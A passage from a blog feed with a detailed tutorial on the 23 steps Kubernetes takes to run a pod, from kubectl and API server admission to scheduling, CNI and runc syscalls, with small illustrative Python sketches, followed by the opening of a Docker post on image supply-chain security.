<li><p>Kubelet calls the container runtime over CRI (<code>RunPodSandbox</code>). containerd creates the pause container, PID 1, calling <code>pause(2)</code> and holding the pod's network namespace.</p>
</li>
<li><p>The CNI plugin (Calico, Flannel, Cilium, your choice) runs ADD. It creates a veth pair, allocates an IP from the pod CIDR, programs routes.</p>
</li>
<li><p>Image pull. containerd fetches the manifest, then the layers, verifying each with SHA-256.</p>
</li>
<li><p>Container create. The runtime stacks image layers with overlayfs, writes the OCI runtime spec, and asks runc to create.</p>
</li>
<li><p>runc takes over. <code>clone3</code> with namespace flags (PID, mount, UTS, IPC), <code>setns</code> into the sandbox's network namespace, mount <code>/proc</code>, <code>pivot_root</code>, drop capabilities, apply the seccomp filter, <code>execve</code> nginx.</p>
</li>
<li><p>Kubelet's PLEG notices the container started. Most clusters still poll the runtime every second. Evented PLEG is the newer event stream version but it is still alpha in 1.36, so don't assume it is on.</p>
</li>
<li><p>The status manager patches <code>pod.status</code> to Running back to the API server. Done.</p>
</li>
</ol>
<h2>Setting the stage</h2>
<p>I teach Kubernetes on the <a href="https://www.youtube.com/@kubesimplify">Kubesimplify YouTube</a> channel, and I still get asked the same question in workshops. What actually happens when I run <code>kubectl run</code>? Most answers stop at "the API server writes to etcd and the scheduler picks a node." That is true, but it is the one line summary of a story that has twenty-three chapters.</p>
<p>So this post is the long form of the six-minute video I just shipped, paired with an <a href="https://kubernetes-explained.vercel.app/pod">interactive site</a> you can scrub through step by step. If you are a platform engineer who already knows what a pod is, my goal is that by the end of this you can name the plugins, the syscalls, the admission chain order, and the CRI calls. And you should be able to point at the Kubernetes source tree when you need to go deeper.</p>
<p>Everything below is checked against Kubernetes 1.36.0, which shipped on April 22, 2026. Where a feature gate matters, I call the version out explicitly.</p>
<h2>Phase 1, the client side (kubectl)</h2>
<h3>Step 1: kubectl parses your command</h3>
<p><code>kubectl run</code> is a subcommand whose job is to take sparse user input and build a valid Pod object. The code lives in <code>staging/src/k8s.io/kubectl/pkg/cmd/run/run.go</code>. For <code>kubectl run nginx --image nginx</code>, the object kubectl builds locally is roughly this.</p>
<pre><code class="language-yaml">apiVersion: v1
kind: Pod
metadata:
  name: nginx
spec:
  containers:
    - name: nginx
      image: nginx
</code></pre>
<p>So notice what is not there. No <code>restartPolicy</code>, no <code>dnsPolicy</code>, no <code>terminationGracePeriodSeconds</code>, no <code>serviceAccountName</code>, no <code>imagePullPolicy</code>. kubectl deliberately sends a minimal object. All those fields are filled in by the API server during defaulting, which happens after mutating admission and before validation. This is the first real insight. The object you POST and the object etcd ends up storing are not the same.</p>
<h3>Step 2: Reading kubeconfig</h3>
<p>kubectl needs to know where to send the request. It reads <code>~/.kube/config</code> (or whatever <code>$KUBECONFIG</code> points at) and resolves three things. The cluster (API server URL, CA bundle), the user (client certs, token, exec plugin), and the context (which cluster and user pair plus a default namespace). The logic sits in <code>client-go/tools/clientcmd</code>. If you run <code>kubectl --v=8</code>, you can watch this resolution happen inline.</p>
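<p>Here is a minimal Python sketch of that resolution, just to make the three lookups concrete. It is not the <code>client-go</code> implementation. The dictionary mirrors the kubeconfig layout, and the helper names (<code>by_name</code>, <code>resolve_context</code>), the server URL, and the user and cluster names are all made up for illustration.</p>
<pre><code class="language-python"># Hypothetical kubeconfig content, already parsed into a dict.
KUBECONFIG = {
    "current-context": "dev",
    "clusters": [
        {"name": "dev-cluster", "cluster": {"server": "https://203.0.113.10:6443"}},
    ],
    "users": [
        {"name": "dev-admin", "user": {"client-certificate": "/path/to/client.crt"}},
    ],
    "contexts": [
        {"name": "dev", "context": {"cluster": "dev-cluster", "user": "dev-admin"}},
    ],
}


def by_name(entries, name):
    """Return the entry whose "name" field matches, or raise KeyError."""
    for entry in entries:
        if entry["name"] == name:
            return entry
    raise KeyError(name)


def resolve_context(config):
    """Resolve the current context into (server, user name, namespace)."""
    context = by_name(config["contexts"], config["current-context"])["context"]
    cluster = by_name(config["clusters"], context["cluster"])["cluster"]
    user = by_name(config["users"], context["user"])
    # A context without an explicit namespace falls back to "default".
    namespace = context.get("namespace", "default")
    return cluster["server"], user["name"], namespace


print(resolve_context(KUBECONFIG))
</code></pre>
<p>The context is only a pair of pointers plus an optional namespace. That is why switching contexts is cheap. Nothing about the cluster or the credentials is copied.</p>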
<h3>Step 3: TCP plus TLS 1.3 handshake</h3>
<p>kubectl opens a TCP connection to the API server on port 6443 and runs a TLS 1.3 handshake. TLS 1.3 is important here. It negotiates keys in a single round trip (TLS 1.2 needed two), and it does so with mutual authentication when you are using a client certificate. Both sides present certs, both sides verify against a CA. Same primitives your browser uses, nothing exotic. But worth noticing because every subsequent byte rides this mTLS tunnel.</p>
<h3>Step 4: HTTP/2 POST to the API server</h3>
<p>kubectl serializes the pod object to JSON, not YAML. YAML is a client side convenience, the wire format is JSON by default. Then it sends <code>POST /api/v1/namespaces/default/pods</code> over HTTP/2. Content-Type is <code>application/json</code>. HTTP/2 matters because all the watch streams later in the story will multiplex over the same connection.</p>
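<p>To make the wire format concrete, here is a small Python sketch that builds the same request pieces from the minimal Pod in Step 1. The function name <code>create_request</code> is hypothetical, and nothing is actually sent. It only shows the method, path, header, and JSON body described above.</p>
<pre><code class="language-python">import json

# The minimal Pod object from Step 1, as a plain dict.
pod = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "nginx"},
    "spec": {"containers": [{"name": "nginx", "image": "nginx"}]},
}


def create_request(obj, namespace="default"):
    """Return (method, path, headers, body) for creating a core/v1 Pod."""
    path = "/api/v1/namespaces/{}/pods".format(namespace)
    headers = {"Content-Type": "application/json"}
    body = json.dumps(obj)  # JSON on the wire, even if you wrote YAML locally
    return "POST", path, headers, body


method, path, headers, body = create_request(pod)
print(method, path)
print(headers)
print(body)
</code></pre>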
<h3>Step 5: Request lands at the API server</h3>
<p>The request hits kube-apiserver. The code path is the generic API server filter chain in <code>staging/src/k8s.io/apiserver/pkg/server/filters</code>. Every inbound request goes through the same stack of filters in order. Panic recovery, request deadline, auditing, authentication, impersonation, authorization, admission, validation. Most of the next phase is those filters.</p>
<h2>Phase 2, the API server gate</h2>
<h3>Step 6: Authentication, "who are you?"</h3>
<p>So the API server asks the first question. Who are you? The API server has four authenticator backends chained together. x509 client certificates, bearer tokens (static, service account, or OIDC), OIDC directly (with JWT verification against the configured issuer), and authentication webhooks (the TokenReview API). The first one that returns a positive identity wins.</p>
<p>For <code>kubectl</code> with a standard kubeconfig, you are usually on x509. The cert you presented in the TLS handshake is reused to populate <code>user.Info</code> with the CN as the username and the O values as groups. Code: <code>staging/src/k8s.io/apiserver/pkg/authentication</code>.</p>
<h3>Step 7: Authorization, "can you do this?"</h3>
<p>With identity established, the next question. Can this user perform create on the resource pods in the namespace default? The default authorizer is RBAC, backed by <code>Role</code>, <code>ClusterRole</code>, <code>RoleBinding</code>, <code>ClusterRoleBinding</code> objects. Multiple authorizers can be chained. In managed clusters you will often see <code>Node,RBAC</code>. The Node authorizer restricts what a kubelet can ask for, RBAC handles everything else. A single "allow" is enough. Explicit denies don't exist in RBAC.</p>
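<p>The "any allow wins, no denies" behaviour is easy to see in a sketch. This Python example is heavily simplified and is not the real RBAC authorizer. It ignores API groups, resource names, and namespaces, and the rule set and function names are assumptions made for illustration.</p>
<pre><code class="language-python"># Hypothetical rules granted to a user through RoleBindings in one namespace.
RULES = [
    {"verbs": ["get", "list", "watch"], "resources": ["pods", "services"]},
    {"verbs": ["create"], "resources": ["pods"]},
]


def rule_allows(rule, verb, resource):
    """A rule matches when both verb and resource are listed ("*" is a wildcard)."""
    verb_ok = verb in rule["verbs"] or "*" in rule["verbs"]
    resource_ok = resource in rule["resources"] or "*" in rule["resources"]
    return verb_ok and resource_ok


def authorize(rules, verb, resource):
    """Allow if any rule matches. There is no deny rule to evaluate."""
    return any(rule_allows(rule, verb, resource) for rule in rules)


print(authorize(RULES, "create", "pods"))
print(authorize(RULES, "delete", "pods"))
</code></pre>
<p>Because rules are purely additive, the only way to take a permission away is to remove the rule or the binding that grants it.</p>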
<h3>Step 8: Mutating admission</h3>
<p>This is the fun one. Mutating admission plugins run first, before schema validation, and they are allowed to change the object. Built-in mutators that fire for a pod create include:</p>
<ul>
<li><p><code>ServiceAccount</code>. Injects the projected service account token volume and the <code>automountServiceAccountToken</code> default.</p>
</li>
<li><p><code>DefaultStorageClass</code>, <code>DefaultTolerationSeconds</code>, <code>PodNodeSelector</code>, <code>RuntimeClass</code>, depending on cluster config.</p>
</li>
<li><p><code>LimitRanger</code>. Applies default <code>resources.requests</code> and limits when a <code>LimitRange</code> exists in the namespace.</p>
</li>
<li><p>Every <code>MutatingAdmissionWebhook</code> you have registered. Service meshes like Istio inject their sidecar here.</p>
</li>
<li><p><code>MutatingAdmissionPolicy</code>. The CEL based in-process alternative to webhooks. This went GA (v1) in 1.36, so you no longer need a feature gate for the stable path.</p>
</li>
</ul>
<p>Each plugin runs sequentially. The order that ships in the API server defaults matters. <code>ServiceAccount</code> before <code>LimitRanger</code>, for example. Source: <code>plugin/pkg/admission</code> in kubernetes/kubernetes.</p>
<h3>Step 9: Schema validation</h3>
<p>After mutation, the API server defaults remaining missing fields (<code>restartPolicy: Always</code>, <code>dnsPolicy: ClusterFirst</code>, <code>terminationGracePeriodSeconds: 30</code>, <code>serviceAccountName: default</code>) and validates the now complete object against the OpenAPI v3 schema published at <code>/openapi/v3</code>. Invalid names, empty required fields, wrong field types, all rejected here with a <code>422 Invalid</code>.</p>
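<p>A rough Python sketch of what defaulting does to the object, assuming only the four defaults named above. The real defaulting code covers many more fields, and <code>apply_defaults</code> is a hypothetical helper, not an API server function.</p>
<pre><code class="language-python">import copy

# Defaults named in the text above; the real defaulting code covers more fields.
POD_SPEC_DEFAULTS = {
    "restartPolicy": "Always",
    "dnsPolicy": "ClusterFirst",
    "terminationGracePeriodSeconds": 30,
    "serviceAccountName": "default",
}


def apply_defaults(pod):
    """Return a copy of the pod with missing spec fields filled in."""
    result = copy.deepcopy(pod)
    for field, value in POD_SPEC_DEFAULTS.items():
        # setdefault leaves any value the user set explicitly untouched.
        result["spec"].setdefault(field, value)
    return result


minimal = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "nginx"},
    "spec": {
        "containers": [{"name": "nginx", "image": "nginx"}],
        "restartPolicy": "Never",
    },
}
stored = apply_defaults(minimal)
print(stored["spec"])
</code></pre>
<p>The explicit <code>restartPolicy: Never</code> survives, and everything the user left out gets a value. This is the gap between the object you POST and the object that gets stored.</p>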
<h3>Step 10: Validating admission</h3>
<p>Validating admission is a second admission pass that cannot mutate. Built-ins include:</p>
<ul>
<li><p><code>ResourceQuota</code>. Do the namespace's quotas have room for this pod's requests?</p>
</li>
<li><p><code>PodSecurity</code>. Does the pod meet the restricted, baseline, or privileged profile the namespace is labeled with?</p>
</li>
<li><p>Every <code>ValidatingAdmissionWebhook</code> you have registered.</p>
</li>
<li><p><code>ValidatingAdmissionPolicy</code>. CEL based in-process validation, GA since 1.30. A great replacement for Kyverno or OPA in many cases.</p>
</li>
</ul>
<p>So here is the subtle bit. Mutating admission runs before validating admission. If a user's webhook mutates a field, the validating chain sees the mutated value, not the original. This ordering is easy to get wrong in your head, and it matters when you are writing policy.</p>
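<p>To see why the ordering matters, here is a toy admission chain in Python. Both plugins are invented for this example (a mutator that adds a default <code>team</code> label and a validator that requires it), and <code>admit</code> is a hypothetical stand-in for the real chain.</p>
<pre><code class="language-python">def add_team_label(pod):
    """Hypothetical mutating step: set a default "team" label if none is present."""
    pod["metadata"].setdefault("labels", {}).setdefault("team", "platform")
    return pod


def require_team_label(pod):
    """Hypothetical validating step: return an error message, or None to admit."""
    if "team" not in pod["metadata"].get("labels", {}):
        return "pods must carry a team label"
    return None


def admit(pod, mutators, validators):
    """Run every mutator in order, then every validator on the mutated object."""
    for mutate in mutators:
        pod = mutate(pod)
    results = (check(pod) for check in validators)
    errors = [message for message in results if message is not None]
    return pod, errors


pod = {"metadata": {"name": "nginx"}, "spec": {"containers": []}}
admitted, errors = admit(pod, [add_team_label], [require_team_label])
print(admitted["metadata"]["labels"], errors)

# Without the mutator, the same validator rejects the same kind of object.
_, errors_without_mutation = admit({"metadata": {"name": "nginx"}}, [], [require_team_label])
print(errors_without_mutation)
</code></pre>
<p>The pod as submitted has no label, yet it passes, because the validator only ever sees the post-mutation object.</p>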
<h3>Step 11: etcd plus Raft quorum</h3>
<p>Now the API server persists the pod. This is not a plain disk write. etcd is a Raft replicated key value store. The leader appends the entry to its Raft log, replicates to followers, each node fsyncs to disk, and only after a majority (3 of 5 in a typical HA setup) acks does the leader commit. The API server's storage layer blocks on that commit.</p>
<p>So if you ever see API write latency spike, etcd disk latency is one of the first things to check. Look at <code>etcd_disk_wal_fsync_duration_seconds</code>. This is really important to know when you are debugging a slow cluster.</p>
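<p>The majority rule itself is simple arithmetic. Here is a short Python sketch of it. The function names are mine, and this models only the counting, not Raft.</p>
<pre><code class="language-python">def quorum(members):
    """Smallest number of members that forms a majority."""
    return members // 2 + 1


def is_committed(acks, members):
    """An entry commits once at least a majority of members have persisted it."""
    return acks in range(quorum(members), members + 1)


for members in (1, 3, 5):
    tolerated = members - quorum(members)
    print(members, "members: quorum", quorum(members), "tolerates", tolerated, "failures")

print(is_committed(2, 5))
print(is_committed(3, 5))
</code></pre>
<p>This is also why etcd clusters are sized with odd member counts. Going from 3 to 4 members raises the quorum without letting you lose any more nodes.</p>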
<h3>Step 12: 201 Created</h3>
<p>The API server responds <code>201 Created</code> with the full defaulted and mutated pod object in the body. kubectl prints:</p>
<pre><code class="language-plaintext">pod/nginx created
</code></pre>
<p>From your terminal's perspective, it is done. From the cluster's perspective, the real work has not started.</p>
<h2>Phase 3, the control loop hands off</h2>
<h3>Step 13: Watch fanout</h3>
<p>Every long running component in Kubernetes holds an HTTP/2 watch stream to the API server. The scheduler watches unscheduled pods. Every kubelet watches pods bound to its node. Controllers watch their respective resources.</p>
<p>So when a new pod is written to etcd, the API server's watch cache broadcasts the event to all subscribers. No polling, no round trips, just a chunked HTTP/2 frame per event. Milliseconds. Source: <code>staging/src/k8s.io/apiserver/pkg/storage/cacher</code>.</p>
<h3>Step 14: Scheduler, Filter</h3>
<p>kube-scheduler receives the event. The pod has no <code>spec.nodeName</code>, so it is the scheduler's problem. The scheduler runs a configurable pipeline of plugins, grouped into extension points: <code>PreFilter</code>, <code>Filter</code>, <code>PostFilter</code>, <code>PreScore</code>, <code>Score</code>, <code>Reserve</code>, <code>Permit</code>, <code>PreBind</code>, <code>Bind</code>, <code>PostBind</code>. For Filter, the main plugins are:</p>
<ul>
<li><p><code>NodeResourcesFit</code>. The node has enough allocatable CPU, memory, and ephemeral storage for the pod's requests.</p>
</li>
<li><p><code>NodeAffinity</code>. The pod's <code>nodeAffinity</code> and <code>nodeSelector</code> match the node's labels.</p>
</li>
<li><p><code>TaintToleration</code>. The pod tolerates the node's taints.</p>
</li>
<li><p><code>PodTopologySpread</code>. The placement respects any topology spread constraints.</p>
</li>
<li><p><code>VolumeBinding</code>. All unbound PVCs can be bound to volumes reachable from this node.</p>
</li>
<li><p><code>InterPodAffinity</code> (at the filter level for hard constraints).</p>
</li>
</ul>
<p>Any node that fails any filter is eliminated. Plugin source: <code>pkg/scheduler/framework/plugins</code>.</p>
<h3>Step 15: Scheduler, Score</h3>
<p>Surviving nodes get scored by a second set of plugins.</p>
<ul>
<li><p><code>NodeResourcesBalancedAllocation</code>. Prefers nodes with balanced CPU and memory utilization, so you don't pack a CPU heavy pod onto an already CPU saturated node.</p>
</li>
<li><p><code>ImageLocality</code>. Prefers nodes that already have the container image cached locally. This saves image pull time.</p>
</li>
<li><p><code>InterPodAffinity</code>. Soft affinity and anti-affinity preferences.</p>
</li>
<li><p><code>NodeAffinity</code>. Soft (preferred) affinity terms.</p>
</li>
<li><p><code>TaintToleration</code>. Soft toleration scoring.</p>
</li>
</ul>
<p>Each plugin returns a score 0 to 100 per node. Scores are normalized, weighted, and summed. Highest total wins. Ties are broken with a random pick using Go's <code>rand.Int()</code>.</p>
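<p>Here is a toy version of "normalize, weight, sum, pick" in Python. The raw scores, the weights, and the normalization formula are assumptions for illustration. In the real scheduler each plugin brings its own normalization logic, and the weights come from the scheduler configuration.</p>
<pre><code class="language-python">import random

# Hypothetical raw plugin scores per node, and hypothetical plugin weights.
RAW_SCORES = {
    "NodeResourcesBalancedAllocation": {"node-1": 40, "node-2": 80, "node-3": 80},
    "ImageLocality": {"node-1": 2, "node-2": 10, "node-3": 10},
}
WEIGHTS = {"NodeResourcesBalancedAllocation": 1, "ImageLocality": 1}
MAX_NODE_SCORE = 100


def normalize(scores):
    """Rescale one plugin's scores so its best node gets MAX_NODE_SCORE."""
    highest = max(scores.values())
    if highest == 0:
        return dict(scores)
    return {node: score * MAX_NODE_SCORE // highest for node, score in scores.items()}


def total_scores(raw_scores, weights):
    """Sum the weighted, normalized scores of every plugin for each node."""
    totals = {}
    for plugin, scores in raw_scores.items():
        for node, score in normalize(scores).items():
            totals[node] = totals.get(node, 0) + weights[plugin] * score
    return totals


def pick_node(totals, rng=random):
    """Return one of the top-scoring nodes, chosen at random on a tie."""
    best = max(totals.values())
    candidates = sorted(node for node, total in totals.items() if total == best)
    return rng.choice(candidates)


totals = total_scores(RAW_SCORES, WEIGHTS)
print(totals)
print(pick_node(totals))
</code></pre>
<p>In this made-up data, <code>node-2</code> and <code>node-3</code> tie, so repeated runs can return either one. That is the same reason two identical pods can land on different nodes in a real cluster.</p>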
<p>One thing to flag here. Dynamic Resource Allocation (DRA) is GA; its core graduated in Kubernetes 1.34. If you are scheduling GPU workloads or other devices through DRA, the scheduler's resource claim handling is now stable. Worth reading the KEP if you are running AI workloads.</p>
<h3>Step 16: Scheduler, Bind</h3>
<p>The scheduler POSTs to the binding subresource. <code>POST /api/v1/namespaces/default/pods/nginx/binding</code> with <code>target.name=node-1</code>. This is what actually updates <code>spec.nodeName</code> in etcd. One more Raft write.</p>
<p>So here is a fun detail. The scheduler never writes <code>spec.nodeName</code> directly on the pod. It always goes through binding. The subresource exists precisely so that binding is a separate permission you can control with RBAC.</p>
<h2>Phase 4, the kubelet brings the pod to life</h2>
<h3>Step 17: Kubelet SyncPod</h3>
<p>Kubelet on the bound node has been watching <code>pods?fieldSelector=spec.nodeName=node-1</code> since startup. It sees the update, runs its pod admission checks (eviction pressure, kubelet level <code>PodSecurityContext</code> sanity), and calls <code>syncPod</code> in <code>pkg/kubelet/kubelet.go</code>. SyncPod is the reconciliation loop. It compares the desired pod spec with the current runtime state and issues CRI calls to bring them into alignment.</p>
<h3>Step 18: CRI, sandbox and the pause container</h3>
<p>Before any app container runs, the kubelet creates a pod sandbox. It calls <code>RunPodSandbox</code> over the CRI gRPC API on the runtime's socket (<code>/run/containerd/containerd.sock</code> by default). containerd launches the pause container. A tiny statically linked binary whose entire job is to call <code>pause(2)</code> and block forever as PID 1.</p>
<p>But why? Because the pause container is what owns the pod's Linux namespaces, especially the network namespace. When you add more containers to the pod, they <code>setns</code> into the pause container's namespaces. If an app container dies and restarts, the namespaces (and the IP) survive because pause is still there.</p>
<h3>Step 19: CNI, pod gets networking</h3>
<p>With the sandbox up, the runtime invokes the CNI plugin specified in <code>/etc/cni/net.d/*.conflist</code> (whichever is lexically first). Calico, Flannel, Cilium, Weave, the plugin you installed. CNI's contract is simple. A binary that reads JSON from stdin, takes an action (<code>ADD</code>, <code>DEL</code>, <code>CHECK</code>), and returns JSON to stdout. The <code>ADD</code> call:</p>
<ol>
<li><p>Creates a veth pair. One end in the pod's network namespace, one end on the node.</p>
</li>
<li><p>Allocates an IP from the pod CIDR. IPAM is either a local store, Kubernetes IPAM, or an external controller.</p>
</li>
<li><p>Programs routes and iptables or eBPF rules on the host.</p>
</li>
<li><p>Optionally sets up sysctls inside the pod's netns.</p>
</li>
</ol>
<p>When this returns, <code>kubectl get pod -o wide</code> will start showing <code>podIP</code>.</p>
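<p>The IP allocation part of <code>ADD</code> can be sketched as a tiny in-memory IPAM in Python. This is a toy, not any real plugin. The class name, the <code>10.244.1.0/24</code> pod CIDR, and the sandbox IDs are assumptions, and real plugins usually reserve addresses such as the gateway and persist their state on disk or in the API.</p>
<pre><code class="language-python">import ipaddress


class PodIPAllocator:
    """Toy IPAM: hands out unused host addresses from one node's pod CIDR."""

    def __init__(self, pod_cidr):
        self.network = ipaddress.ip_network(pod_cidr)
        self.assigned = {}  # sandbox ID to IP address

    def add(self, sandbox_id):
        """Mimics the IPAM part of a CNI ADD: reserve and return an address."""
        if sandbox_id in self.assigned:
            return self.assigned[sandbox_id]
        in_use = set(self.assigned.values())
        for ip in self.network.hosts():
            if ip not in in_use:
                self.assigned[sandbox_id] = ip
                return ip
        raise RuntimeError("pod CIDR exhausted")

    def delete(self, sandbox_id):
        """Mimics CNI DEL: release the address so it can be reused."""
        self.assigned.pop(sandbox_id, None)


ipam = PodIPAllocator("10.244.1.0/24")
print(ipam.add("sandbox-a"))
print(ipam.add("sandbox-b"))
ipam.delete("sandbox-a")
print(ipam.add("sandbox-c"))
</code></pre>
<p>Notice that the address is tied to the sandbox, not to the app container. That matches the pause container story above: app containers can restart and the IP stays.</p>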
<h3>Step 20: Image pull</h3>
<p>Kubelet calls <code>PullImage</code> over CRI. containerd resolves the reference (<code>nginx</code> to <code>docker.io/library/nginx:latest</code>), fetches the manifest, then pulls the layers in parallel, verifying each layer against its SHA-256 digest. First pull for a popular image over broadband is a few seconds. Cached? About 100 ms. containerd just revalidates the manifest and returns.</p>
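<p>The digest check is plain hashing. Here is a minimal Python sketch of it. The function names and the fake layer bytes are assumptions for illustration, and this is not containerd's code.</p>
<pre><code class="language-python">import hashlib


def digest_of(blob):
    """Return the OCI-style digest string for a blob of bytes."""
    return "sha256:" + hashlib.sha256(blob).hexdigest()


def verify_blob(blob, expected_digest):
    """Raise ValueError if the downloaded bytes do not match the expected digest."""
    actual = digest_of(blob)
    if actual != expected_digest:
        raise ValueError("digest mismatch: expected {} got {}".format(expected_digest, actual))
    return True


layer = b"pretend this is a compressed layer tarball"
manifest_digest = digest_of(layer)  # in reality this value comes from the manifest

print(verify_blob(layer, manifest_digest))
try:
    verify_blob(layer + b"tampered", manifest_digest)
except ValueError as err:
    print("rejected:", err)
</code></pre>
<p>Since the manifest lists the digest of every layer, a single flipped byte anywhere in a layer makes the pull fail instead of silently running modified content.</p>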
<h3>Step 21: Container create</h3>
<p>With the image unpacked, the runtime assembles the container.</p>
<ul>
<li><p>Stacks the image layers as read only lower layers and adds a writable upper layer using overlayfs. The result is the container's rootfs.</p>
</li>
<li><p>Writes the OCI runtime spec (<code>config.json</code>). A JSON document describing every mount, every namespace flag, every capability, the seccomp profile, the apparmor profile, the cgroup limits, the user, the entrypoint.</p>
</li>
<li><p>Creates a bundle directory containing the rootfs and <code>config.json</code> and hands it to runc with <code>runc create</code>.</p>
</li>
</ul>
<p>OCI runtime spec lives in the <code>opencontainers/runtime-spec</code> repo. This is the same spec Podman, CRI-O, and gVisor use. It is the portability boundary.</p>
<h2>Phase 5, runc, namespaces, and the first breath</h2>
<h3>Step 22: runc</h3>
<p>So this is the single coolest part of the whole pipeline. runc takes the bundle and does the following.</p>
<ol>
<li><p>Calls <code>clone3</code> with flags <code>CLONE_NEWPID | CLONE_NEWNS | CLONE_NEWUTS | CLONE_NEWIPC</code>. On a modern kernel, <code>clone3</code> is preferred over the older <code>clone</code> because it takes a structured argument and supports more namespace flags cleanly. The network namespace is not created here. Instead, runc uses <code>setns</code> to enter the sandbox's network namespace that CNI created earlier, so the new container shares the pod IP.</p>
</li>
<li><p>Inside the new process, mounts <code>/proc</code> for the new PID namespace.</p>
</li>
<li><p><code>pivot_root</code> into the overlayfs rootfs, then unmounts the old root.</p>
</li>
<li><p>Drops Linux capabilities to the OCI spec's bounding set. The default for a non-privileged container is a tight whitelist. No <code>CAP_SYS_ADMIN</code>, no <code>CAP_NET_ADMIN</code>.</p>
</li>
<li><p>Applies the seccomp filter. The runtime default profile blocks around 40 syscalls, like <code>kexec_load</code>, certain <code>unshare</code> flags, and <code>bpf</code> without capability.</p>
</li>
<li><p>Joins the cgroup v2 hierarchy with the configured CPU and memory limits.</p>
</li>
<li><p>Calls <code>execve</code> on the container's entrypoint, <code>nginx -g daemon off;</code>. <code>execve</code> is the syscall that replaces the current process image with a new program while keeping the PID. This is the moment nginx is alive.</p>
</li>
</ol>
<p>If you <code>strace -f</code> runc during create, you will see this whole dance. It is worth doing once.</p>
<h3>Step 23: PLEG and the Running status</h3>
<p>Kubelet needs to know the container started. Historically, kubelet's PLEG (Pod Lifecycle Event Generator) polled the runtime every second via <code>ListContainers</code>, diffed the result, and emitted events. On a big node with hundreds of pods, this was a measurable source of CPU load.</p>
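<p>The polling approach boils down to "take a snapshot, diff it against the last one, emit events". Here is a simplified Python sketch of that diff. The container IDs, state strings, and the <code>relist_events</code> name are made up, and the real PLEG tracks much more state per pod.</p>
<pre><code class="language-python">def relist_events(previous, current):
    """Diff two snapshots of container ID to state and return lifecycle events."""
    events = []
    for container_id, state in sorted(current.items()):
        # New containers and containers whose state changed both produce an event.
        if previous.get(container_id) != state:
            events.append((container_id, state))
    for container_id in sorted(set(previous) - set(current)):
        events.append((container_id, "removed"))
    return events


# Two hypothetical snapshots taken one relist period apart.
before = {"pause-abc": "running"}
after = {"pause-abc": "running", "nginx-def": "running"}

print(relist_events(before, after))
</code></pre>
<p>The cost is visible in the shape of the function. Every relist walks every container on the node, even when nothing changed.</p>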
<p>So there is a newer path called Evented PLEG. It opens a CRI event stream (the <code>GetContainerEvents</code> RPC) so containerd pushes events like <code>CONTAINER_STARTED_EVENT</code> and <code>CONTAINER_STOPPED_EVENT</code> as they happen. But here is the thing. Evented PLEG is still alpha in 1.36. It was introduced as alpha in 1.26, promoted to beta in 1.27, then reverted to alpha in 1.30 after a static pod bug. It is disabled by default. So if you are reading kubelet code today, assume the polling path is what is actually running on your cluster.</p>
<p>When kubelet sees a new container has started (through polling or evented), the status manager computes the pod's phase as Running and patches <code>pod.status</code> back to the API server via a strategic merge patch. Watchers (you, with <code>kubectl get pod -w</code>) see the transition. The status patch is also the signal to any controller waiting on this pod. For example, the EndpointSlice controller, which is about to add the pod's IP to a Service's <code>EndpointSlice</code>.</p>
<p>And that is the whole journey. From <code>argv[1]</code> in your shell to nginx serving on port 80, about a second on a warm cluster.</p>
<h2>Further reading</h2>
<ul>
<li><p><a href="https://github.com/kubernetes/kubernetes">kubernetes/kubernetes</a>. The source tree. Start in <code>pkg/kubelet</code>, <code>pkg/scheduler</code>, <code>staging/src/k8s.io/apiserver</code>.</p>
</li>
<li><p><a href="https://github.com/kubernetes/cri-api">CRI spec</a>. The gRPC contract between kubelet and the runtime.</p>
</li>
<li><p><a href="https://github.com/containernetworking/cni">CNI spec</a>. The plugin contract for pod networking.</p>
</li>
<li><p><a href="https://github.com/opencontainers/runtime-spec">OCI runtime spec</a>. The container bundle and config format runc consumes.</p>
</li>
<li><p><a href="https://github.com/opencontainers/image-spec">OCI image spec</a>. Manifests, layers, and the SHA-256 content addressable model.</p>
</li>
<li><p><a href="https://github.com/kubernetes/enhancements/tree/master/keps/sig-node/3386-kubelet-evented-pleg">KEP-3386 Evented PLEG</a>. The design doc for the CRI event driven PLEG, still alpha in 1.36.</p>
</li>
<li><p><a href="https://kubernetes.io/docs/reference/scheduling/config/#scheduling-plugins">kube-scheduler plugin docs</a>. The official list of in-tree plugins and their extension points.</p>
</li>
</ul>
<h2>Watch and play</h2>
<ul>
<li><p>Video (6 min): <a href="https://youtu.be/LLuUhU3SwJo?si=GyN5qYp71OgXMWFA">What Actually Happens When You Run kubectl run nginx (23 Steps)</a> on the Kubesimplify YouTube channel.</p>
</li>
<li><p>Interactive site: <a href="https://kubernetes-explained.vercel.app/pod">kubernetes-explained.vercel.app/pod</a>. Pause, scrub, jump to any step, copy the code for yourself.</p>
</li>
</ul>
<p>So if you liked this, the next one in the series is the scheduler deep-dive. How <code>kube-scheduler</code> actually decides. Subscribe on the channel so you catch it, and tell me in the comments which step surprised you. That is how I know what to unpack next.</p>
]]></content:encoded></item><item><title><![CDATA[Day 2: Your Images Are a Supply Chain - and It's Probably Broken]]></title><description><![CDATA[7 Days of Docker (2026) - by Saloni Narang, Docker Captain & CNCF Ambassador

I'm a Docker Captain. I've seen hundreds of Docker tutorials explain images as "blueprints" or "templates" and then move o]]></description><link>https://blog.kubesimplify.com/day-2-your-images-are-a-supply-chain-and-it-s-probably-broken</link><guid isPermaLink="true">https://blog.kubesimplify.com/day-2-your-images-are-a-supply-chain-and-it-s-probably-broken</guid><category><![CDATA[Open Source]]></category><category><![CDATA[2025toptools]]></category><category><![CDATA[Docker]]></category><dc:creator><![CDATA[Saloni Narang]]></dc:creator><pubDate>Thu, 23 Apr 2026 09:33:10 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/c66a8641-54fb-436f-bdbe-61d55c8d22e0.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong>7 Days of Docker (2026)</strong> - by Saloni Narang, Docker Captain &amp; CNCF Ambassador</p>
</blockquote>
<p>I'm a Docker Captain. I've seen hundreds of Docker tutorials explain images as "blueprints" or "templates" and then move on. That's not good enough anymore. In March 2026, the tool you use to scan for vulnerabilities <em>was</em> the vulnerability - attackers pushed backdoored Trivy scanner images to Docker Hub, and thousands of CI/CD pipelines had their secrets stolen before anyone noticed.</p>
<p>If you don't understand what an image actually is, where it comes from, and how to verify it, you're not just writing bad Dockerfiles. You're leaving the door open.</p>
<p>Today, we fix that.</p>
<hr />
<h2>What IS an Image? (Not "Layers Like a Cake")</h2>
<p>Forget the analogies. Here's what actually happens.</p>
